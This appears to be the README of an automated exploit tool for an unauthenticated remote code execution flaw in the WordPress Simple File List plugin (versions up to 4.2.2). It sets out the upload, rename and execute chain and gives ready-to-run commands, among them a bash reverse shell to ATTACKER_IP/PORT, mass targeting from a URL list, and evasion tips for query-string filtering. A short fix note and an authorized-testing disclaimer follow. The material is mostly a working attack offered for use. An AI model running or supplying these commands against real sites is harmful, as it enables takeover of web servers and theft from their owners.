
Exploit for CVE-2025-34085
An automated exploit for CVE-2025-34085 (duplicate of CVE-2020-36847), a critical unauthenticated remote code execution vulnerability in the WordPress Simple File List plugin versions ≤ 4.2.2.
Note: CVE-2025-34085 was rejected by MITRE as a duplicate of CVE-2020-36847. The vulnerability is real and patched in version 4.2.3. Both CVE IDs refer to the same underlying issue.
| Field | Detail |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Affected Versions | ≤ 4.2.2 |
| Fixed Version | 4.2.3 |
| Type | Unrestricted File Upload → Rename Bypass → RCE |
| CVSS | 9.8 (Critical) |
| Authentication | None required |
| Original Discovery | coiffeur |
| Metasploit Module | exploit/multi/http/wp_simple_file_list_rce |
Upload — A PHP payload is uploaded disguised as a .png file via the plugin's upload endpoint (ee-upload-engine.php). The upload engine validates extensions but accepts image files.
Rename — The plugin's rename functionality (ee-file-engine.php) does not enforce extension restrictions. The attacker renames the .png to .php (or .phtml, .php5, .php3).
Execute — The renamed PHP file is now accessible and executable in the uploads directory at /wp-content/uploads/simple-file-list/, giving the attacker arbitrary command execution.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd= parameter)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Create a targets.txt file with one URL per line:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
| Argument | Description | Default |
|---|---|---|
-u, --url | Single target URL | — |
--cmd | Command to execute on the target | id |
--inline | Inject command directly into the PHP shell (hardcoded, no ?cmd= webshell) | False |
Tip: Use
--inlinewhen you need a reverse shell or when the target has query string filtering. Without--inline, the exploit drops a webshell that accepts commands via?cmd=.
Successful exploits are logged to vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt locally — useful for your report--inline with a reverse shell to avoid leaving a persistent webshell with ?cmd=Upgrade the Simple File List plugin to version 4.2.3 or later.
This tool is intended for authorized penetration testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.